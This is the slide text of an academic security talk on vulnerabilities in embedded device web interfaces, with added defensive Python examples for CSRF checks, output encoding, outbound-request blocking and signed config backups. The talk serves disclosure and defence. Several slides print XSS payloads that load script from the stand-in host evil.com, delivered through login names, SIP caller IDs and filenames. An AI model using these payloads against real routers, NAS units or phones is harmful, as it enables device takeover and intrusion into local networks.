Web management interface

Managing embedded devices via a web interface
► Easier for users
► Cheaper for vendors
Internet

► 240M registered domains
► 72M active domains
Source: Netcraft

Hristo Bojinov, Elie Bursztein, Dan Boneh
Thursday, July 30, 2009
Embedded Management Interfaces: Emerging Massive Insecurity



Web security prominence

Today:
► top server-side issue
► top client-side issue
Web application spectrum

[Figure: spectrum of web applications, from popular Internet web sites to custom applications]
Embedded device prominence

Embedded web applications are everywhere
► 100M+ WiFi access points
► also in millions of switches, printers, consumer electronics

[Figure: map of San Francisco WiFi access points; source: skyhookwireless]
Embedded web servers will soon dominate

Spectrum revisited

Recipe for a disaster

Vendors build their own web applications
► Standard web server (sometimes)
► Custom web application stack
► Weak web security

New features/services added at a fast pace
► Vendors compete on number of services in product
► Interactions between services → vulnerabilities
Some vendors got it right...

[Screenshot: Kodak EasyShare digital frame » Settings » General Settings: Language, Frame Name, Automatic resizing, USB Connection Mode (connect to computer / connect to printer), About (frame model number, frame serial number, firmware version, touch panel version)]

... almost.

[Screenshot: the frame's feed configuration page: "You can set up your frame to view multimedia content feeds directly from the Web from sites such as those listed below. We've set up a few sample feeds to get you started. Click "Add..." to set up your own."]
The result

Vulnerabilities in every device we audited

Outline

► Audit methodology: auditing a zoo of devices
► Illustrative attacks
► Defenses and lessons learned
Overall audit results

► 8 categories of devices
► 6 different brands
► 23 devices
► 50+ vulnerabilities reported to CERT
Attack types

Popular ones:
► Cross Site Scripting (XSS)
► Cross Site Request Forgery (CSRF)

► Cross-Channel Scripting (XCS) attacks

► File security
► User authentication
Stored Cross Site Scripting (XSS) illustrated

D-Link DNS-323
► Allows users to share files
► Configured via Web

Stored XSS illustrated
Fill in an HTTP form with:
<script>..</script>

Attack result

[Screenshot: D-Link DNS-323 Device Information page (Setup / Advanced / Tools / Status / Support; IP Address 192.168.1.103, Subnet Mask 255.255.255.0, Gateway IP Address 192.168.1.1, DNS1 171.64.7.55, DNS2 171.64.7.121) after the injected script has run]
Cross Site Request Forgery (CSRF) illustrated

Netgear FS750T2
► Intelligent switch
► Configured via Web

CSRF illustrated

[Diagram: administrator's browser between the switch and the Internet]
1 Administer the switch
2 Browse the web
3 Trigger POST (e.g. via Ads)
4 Forward the bad POST request
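As an added, defender-side example that is not part of the talk's slides: the server-side check a device like the switch above needs so that step 4 (the browser forwarding a POST that an ad page triggered) has no effect. It is standard-library Python; the session class, the form layout and the device origin http://192.168.1.103 (an address reused from the DNS-323 slide) are assumptions made for the example, not the switch's actual implementation.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumption for the example: the management interface is served from this origin.
DEVICE_ORIGIN = "http://192.168.1.103"


class AdminSession:
    """Server-side session created at login; carries an unguessable CSRF token.
    An attacker's page can make the admin's browser send the session cookie,
    but it cannot read this token out of the device's pages."""

    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)


def render_config_form(session):
    """Every state-changing form the device serves embeds the session token."""
    return (
        '<form method="POST" action="/apply">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="ip"><input type="submit" value="Apply"></form>'
    )


def _origin_of(headers):
    """Origin (or, failing that, Referer) is set by the browser, not by the page
    that triggered the request, so it identifies where the POST came from."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return None
    parts = urlparse(source)
    return f"{parts.scheme}://{parts.netloc}"


def authorize_state_change(session, headers, form):
    """Return (allowed, reason). A POST changes device state only if it carries
    a valid session, comes from the device's own origin, and echoes the token."""
    if session is None:
        return False, "not logged in"
    if _origin_of(headers) != DEVICE_ORIGIN:
        return False, "cross-origin request"
    supplied = str(form.get("csrf_token", "")).encode()
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied, session.csrf_token.encode()):
        return False, "bad csrf token"
    return True, "ok"


if __name__ == "__main__":
    session = AdminSession()
    legit = authorize_state_change(
        session, {"Origin": DEVICE_ORIGIN},
        {"csrf_token": session.csrf_token, "ip": "192.168.1.50"})
    forged = authorize_state_change(
        session, {"Origin": "http://ads.example"}, {"ip": "10.0.0.1"})
    print("legitimate POST:", legit)
    print("POST triggered from an ad page:", forged)
```

The Origin check alone would stop the slide's ad-triggered POST; the token is kept as well because older browsers did not send Origin and Referer can be stripped, and because the token also protects against a script injected into the device's own pages forging requests from a different session.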
Cross Channel Scripting (XCS) illustrated

LaCie Ethernet disk mini
► Share access control
► Web interface
► Public FTP

XCS illustrated

[Diagram: Attacker → FTP server → file system → Web App (NAS) → Admin Browser]
► Attacker uploads the file: <script>..</script>.pdf
► The web app reflects the filename: <script>..</script>.pdf

Attack result

[Screenshot: Mozilla Firefox on the NAS share-browsing page (/cgi-bin/browse) showing the injected text "Hello! We now own your secret data. For example:" followed by a directory listing that contains "secret code.exe"]
XCS: cross-channel scripting

Devices as stepping stones

[Diagram: attacker, administrator's browser, the device and the local network]
3 Trigger POST (e.g. via Ads)
4 Infect the device
5 Access files
6 Send malicious payload
7 Attack local network
Brands

[Figure: logos of the audited brands, including NETGEAR]

Vulnerabilities by category

[Chart]

Devices by Brand

[Chart]
Attack surface

► Confidentiality
► Integrity
► Availability
► Access control
► Attribution

Attack surface result

Confidentiality: 5 (steal private data)
Integrity: 22 (reconfigure device)
Availability: 10 (reboot device)
Access control: 23 (access files without password)
Attribution: [count illegible] (don't log access)




Login + Log XSS

Quick warm-up: LOM
► LOM basics
► Log XSS

LOM basics
► Lights-out recovery, maintenance, inventory tracking
► PCI card and chipset varieties available
► Separate NIC and admin login*
► Low-security default settings
► Motherboard connection
► Usually invisible to OS

Log XSS
► Known for a decade
► Traditionally injected via DNS
► Also see recent IBM BladeCenter advisory
http://www.cert.fi/en/reports/2009/vulnerability2009029.html
Persistent Log-based XSS

[Diagram: attacker, LOM controller, administrator]
1 Attacker attempts to login as user
");</script><script src="//evil.com/"></script><script>
2 Admin views syslog
3 Payload executes

Login+Log XSS attack result

[Screenshot: Dell Remote Access Controller 4/P (DRAC 4) on a PowerEdge server at 172.24.78.136, logged in as admin (Administrator), Logs tab (SEL | Last Crash Screen | DRAC 4 Log), Stanford Security Lab; the login attempt's username has been written into the log page]
Cross Channel Scripting (XCS)

Moving on to real XCS
► VoIP phone
► Photo frame

SIP XCS

VoIP phone
► Linksys SPA942
► Web interface
► SIP support
► Call logs

SIP XCS
1 SIP: xyz@mydomain calls abc@thatdomain
2 RTP: carries actual binary data

SIP XCS
1 Attacker makes a call as
<script src="//evil.com/"></script>
2 Administrator accesses web interface
3 Payload executes

SIP XCS attack result

[Screenshot: Linksys (A Division of Cisco Systems, Inc.) SPA942 call log page, Redial List / Answered Calls / Missed Calls; part of the page removed to conserve space]
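The LaCie, DRAC and SPA942 cases above share one defect: a string that entered through FTP, the login prompt or SIP is later written into the management page without encoding for the context it lands in. The following is an added example (not code from the talk or from any of the vendors) showing the two encoders such a page needs: one for HTML element bodies, used for the share listing and the call log, and one for JavaScript string literals, used where a log viewer hands entries to client-side script, which is the context the DRAC payload's leading `");` targets. The page layouts, the `logEntries` array and the sample strings are constructed for the example.

```python
import html
import json

# Constructed samples of strings the slides show arriving through a non-web
# channel: an FTP filename, a login name that reaches syslog, a SIP caller
# identity. None of them should ever execute in the administrator's browser.
UNTRUSTED_SAMPLES = {
    "ftp_filename": "<script>..</script>.pdf",
    "login_username": '");</script><script src="//evil.com/"></script><script>',
    "sip_caller": '<script src="//evil.com/"></script>',
}


def html_text(value):
    """Encode a device-sourced string for an HTML element body or a quoted
    attribute. Every tag-forming character becomes an entity, so the browser
    displays the string instead of parsing it."""
    return html.escape(str(value), quote=True)


def js_string_literal(value):
    """Encode a device-sourced string as a JavaScript string literal that is
    safe inside a <script> block. json.dumps handles quotes and backslashes
    and (with its default ensure_ascii) the U+2028/U+2029 line terminators;
    the extra replacements stop a literal '</script>' from ending the block,
    which the HTML parser would do regardless of JavaScript quoting."""
    literal = json.dumps(str(value))
    for raw, escaped in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(raw, escaped)
    return literal


def decode_js_string_literal(literal):
    """Inverse used to check that encoding loses nothing: the \\uXXXX escapes
    are valid JSON as well as valid JavaScript."""
    return json.loads(literal)


def render_listing(title, names):
    """A share browser or call-log page: names land inside element bodies."""
    items = "".join(f"<li>{html_text(n)}</li>" for n in names)
    return f"<h1>{html_text(title)}</h1><ul>{items}</ul>"


def render_log_viewer(log_lines):
    """A syslog viewer that hands the entries to client-side script as an
    array literal; the log line format mirrors the httpd(pam_unix) entries
    visible in the SiteFirewall screenshots, constructed here."""
    entries = ",".join(js_string_literal(line) for line in log_lines)
    return f"<script>var logEntries = [{entries}];</script>"


if __name__ == "__main__":
    print(render_listing("share", [UNTRUSTED_SAMPLES["ftp_filename"]]))
    print(render_listing("Missed Calls", [UNTRUSTED_SAMPLES["sip_caller"]]))
    line = ("Jan 10 02:19:46 httpd(pam_unix)[17617]: bad username ["
            + UNTRUSTED_SAMPLES["login_username"] + "]")
    print(render_log_viewer([line]))
```

The rule the example encodes is that the channel a string arrived on (FTP, PAM, SIP) says nothing about whether it is safe in HTML; only the output context does. A device that renders the same value in both an element body and a script block needs both encoders, and neither can be replaced by input filtering at the FTP server or the SIP stack, since those never see the HTML.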
Photo frame sales

[Chart: The Global Digital Photo Frame Market, Quarterly Unit Sales (1Q07-4Q08), quarters 1Q07 through 4Q08 on the x-axis, units (up to 6,000,000) on the y-axis. Source: Digital Photo Frame Market: Global 2H08 Update, © 2009 Parks Associates]
Photo frame XCS

WiFi photo frame
► Samsung SPF85V
► RSS/URL feed
► Windows Live
► WMV/AVI

Photo frame XCS

Fetch photos from the Internet. Watch movies too.

Operation
► Use browser interface to set up
► You can also see the current photo!
► Many configuration fields: RSS, URLs, etc.

Photo frame XCS
1 Attacker infects via CSRF
2 User connects to manage
3 Payload executes

Photo frame XCS attack result

[Screenshot: the frame's web interface reading "There is a ghost in here", "Now Playing: bouh.jpg", and a "Ghost activity report" (injecting payload; stealing the file/image; file loaded, decoding it; decode complete, re-encoding; leaking file; ghosting completed, file out), with the frame serial number and firmware version fields]

Photo frames as stepping stones

[Diagram: home network with the frame]
1 Frame gets infected via grandma's browser
2 Son connects to upload photos
3 Intranet infected

Photo frame XCS

Bonus "feature":
► Current photo visible without login
A vehicle for scams?

eStarling photo frame
► receive photos via email
► predictable address
Big picture

Embedded web servers are everywhere
► In homes, offices
► Various types and functions
► Massive attack surface (in aggregate)
► Can be used as stepping stones into LAN

Big picture

Security: not a priority so far
► Single exploits: well known
► However, the trend is a concern
► Rise of multi-protocol devices: XCS
► Rise of browser-OS: 24x7 exploitability




Defense approaches

Today
► Internal audits by IT staff and end-users

Near-term
► SiteFirewall: IT, browser vendors

Long-term
► Server-side security gains
SiteFirewall

Injected script can issue requests at will
<script src="http://evil.com">

Before

[Screenshot: NAS management page (Configuration | Network | Disk | Shares | Users | Status) whose log view lists httpd(pam_unix) entries ("session opened for user admin by (uid=0)", "session closed for user admin", "bad username [...]") followed by content the injected script fetched: "We now own your secret data. For example:" and a directory listing of secret/ containing secret_code.exe]

SiteFirewall

SiteFirewall (a Firefox extension) prevents internal websites from accessing the Internet.

Page interactions with the Internet blocked.

After

[Screenshot: the same NAS log page with SiteFirewall installed; the injected script's request to the Internet is blocked and only the raw log lines are shown (httpd(pam_unix) session opened/closed and bad username entries, kernel and ifplugd link state messages)]
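As an added example of the policy the SiteFirewall slides describe (not the extension's own code, which the slides do not show): a page served by an internal host may not fetch anything from the Internet, so the injected `<script src="http://evil.com">` above is blocked while the page's own sub-requests still load. The example models the decision in standard-library Python; what counts as "internal" (private, loopback and link-local addresses, plus bare or `.local` host names) is an assumption made here.

```python
import ipaddress
from urllib.parse import urljoin, urlparse


def is_internal_host(host):
    """Internal means an RFC 1918, loopback or link-local address, or a name
    without a public domain suffix (assumption for the example: 'nas' or
    'nas.local' are internal, 'evil.com' is not)."""
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host or host.endswith(".local")
    return ip.is_private or ip.is_loopback or ip.is_link_local


def should_block(page_url, request_url):
    """The SiteFirewall rule: a page served by an internal host may not reach
    a non-internal host. Relative and protocol-relative URLs (the slides use
    the form //evil.com/) are resolved against the page first."""
    page_host = urlparse(page_url).hostname or ""
    target_host = urlparse(urljoin(page_url, request_url)).hostname or ""
    return is_internal_host(page_host) and not is_internal_host(target_host)


def filter_page_requests(page_url, request_urls):
    """Split the sub-requests a page issues into (allowed, blocked) lists."""
    allowed, blocked = [], []
    for url in request_urls:
        (blocked if should_block(page_url, url) else allowed).append(url)
    return allowed, blocked


if __name__ == "__main__":
    # Constructed: the NAS share page from the XCS slides issuing three requests.
    page = "http://192.168.1.103/cgi-bin/browse"
    requests = ["/logo.png", "http://evil.com/x.js", "http://192.168.1.1/"]
    print(filter_page_requests(page, requests))
```

The decision is made on the host name in the URL, which is what a browser extension sees at request time; an enforcement point that wants to resist DNS rebinding must also apply the same classification to the address the name resolves to.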
Server-side defenses

Difficulties
► No standard platform to build for
► Adding insecure features: unavoidable

Requirements
► Security is a top priority
► Performance trade-offs possible
► Architectural trade-offs: kernel vs. web server

Opportunities
► Use captchas
► Process sandboxing
► Data storage and access model

Future work: development framework
► Secure embedded web applications
► RoR too heavyweight in this context
Another boring NAS device?

SOHO NAS
► Buffalo LS-CHL
► BitTorrent support!

Massive exploitation

[Diagram: create a bad torrent ("Famous movie.torrent") and let it spread to the NAS devices that download it]

Peer-to-peer XCS attack result

[Screenshot: Buffalo NAS Torrent Download Manager, Torrent Downloads list (Browse... / Add; Start / Stop / Remove; Name, Size, Progress); the listed torrent's name contains an iframe with an onload handler that rewrites part of the page, and the text "XCS attack" appears in the page]
Conclusion

► Sticky technology
► Standardize...
  remote access
  firmware upgrade
  rendering to HTML
  configuration backup

Thanks to Eric Lovett and Parks Associates!
Configuration file XCS

WiFi router
► Linksys WRT54G2
► Standard features
► Config backup

Mature technology.

Configuration file XCS

[Diagram: Save file → Configuration file → Tampering with the file → Restore file]

Configuration file XCS attack result

[Screenshot: Linksys WRT54G2 (Setup / Wireless / Security / Access Restrictions / Applications & Gaming / Administration / Status), Access Restrictions » Internet Access page after restoring the tampered file: Internet Access Policy 1 ("firewall test"), Status Enable/Disable, Policy Name, PCs (Edit List of PCs), Deny/Allow Internet access during selected days, Days (Everyday, Sun ... Sat), Times; the help sidebar text (Internet Access Policy, Status, Policy Name, Days, Times) is partly overwritten by the injected content]
An easy fix

[Diagram: Save file → Configuration file → Restore file, with a signature check on restore]

Sign with a device private key!
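An added example of the fix proposed above, not the router's firmware or any vendor code: the backup is authenticated when saved and verified before anything in it is parsed on restore, so a file edited between "Save file" and "Restore file" is rejected. The slide proposes a device private key; this stand-in uses an HMAC under a per-device secret, which gives the same property for a backup that only the same device ever restores (an asymmetric signature plugs into the same two functions). The secret, the device identifier and the file layout are constructed for the example.

```python
import hashlib
import hmac
import json

# Constructed values: on a real device the secret lives in non-volatile
# storage and never leaves the device; the identifier is per unit.
DEVICE_SECRET = bytes.fromhex("1f" * 32)
DEVICE_ID = "wrt54g2-example-0001"


class BackupRejected(Exception):
    """Raised by import_backup when a file fails verification."""


def _canonical_bytes(obj):
    # Deterministic serialisation: the same config always authenticates the same bytes.
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def export_backup(config, secret=DEVICE_SECRET, device_id=DEVICE_ID):
    """'Save file': bind the config to this device and append an authentication tag."""
    payload = _canonical_bytes({"device_id": device_id, "config": config})
    tag = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return json.dumps({"payload": payload.decode(), "tag": tag})


def import_backup(blob, secret=DEVICE_SECRET, device_id=DEVICE_ID):
    """'Restore file': verify first; only a file that passes is parsed as configuration."""
    try:
        outer = json.loads(blob)
        payload = outer["payload"].encode()
        tag = outer["tag"]
    except (ValueError, KeyError, TypeError, AttributeError):
        raise BackupRejected("malformed backup file")
    if not isinstance(tag, str):
        raise BackupRejected("malformed backup file")
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    # Constant-time comparison of the tags.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        raise BackupRejected("tag mismatch: file was modified or not produced by this device")
    body = json.loads(payload)
    if body.get("device_id") != device_id:
        raise BackupRejected("backup was made on a different device")
    return body["config"]


def restore_outcome(blob):
    """Helper for demo and tests: ('restored', config) or ('rejected', reason)."""
    try:
        return ("restored", import_backup(blob))
    except BackupRejected as err:
        return ("rejected", str(err))


if __name__ == "__main__":
    # Constructed config resembling the access policy on the WRT54G2 screenshot.
    config = {"access_policy": {"name": "firewall test", "status": "enable",
                                "days": ["Sun", "Mon"]}}
    saved = export_backup(config)
    print(restore_outcome(saved))
    print(restore_outcome(saved.replace("firewall test", "<script>..</script>")))
```

Binding the device identifier into the authenticated payload also stops a backup taken from one unit being restored on another; without it a valid tag from any device with the same secret would pass. Verification happens before the payload is decoded, so a malformed or tampered file never reaches the configuration parser.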
What about arbitrary file inclusion?

[Screenshot: Linksys Compact Wireless-G Internet Video Camera, Setup » Basic page, displaying the root entry of the device's password file inside the page]
More attacks: Switches

[Screenshot: Netgear switch System Setting page (System Name, Location Name, Login Timeout (3-30 minutes), IP Address: Get Dynamic IP from DHCP Server / Static IP Address 192.168.1.103, Subnet mask 255.255.255.0, Gateway 192.168.1.1; Apply / Help) with a JavaScript alert box reading "The page at http://192.168.1.103 says:"]

[Screenshot: Trendnet switch System Information page (System Name, System Description "8 10/100TX + 1 10/100/1000T + 1 MINI-GBIC Managed Switch", System Location, System Contact, Firmware Version v1.01, Kernel Version v1.61, MAC Address; Apply / Help) with injected content rendered in the page]
More attacks: LOM

[Screenshot: IBM Remote Supervisor Adapter II (RSA II) web interface: Monitors (System Status, Vital Product Data), Tasks (Power/Restart, Remote Control, PXE Network Boot, Firmware Update), ASM Control (System Settings, Login Profiles), Event Log]

Intel vPro/AMT

[Screenshot: Intel Active Management Technology web interface: System Status, Hardware Information (System, Processor, Memory, Disk, Battery), Event Log, Remote Control, Power Policies, Network Settings, Wireless Settings (Band mode capabilities ABGN, Radio state Off, Wireless Management Profiles Disabled, Enable), User Accounts]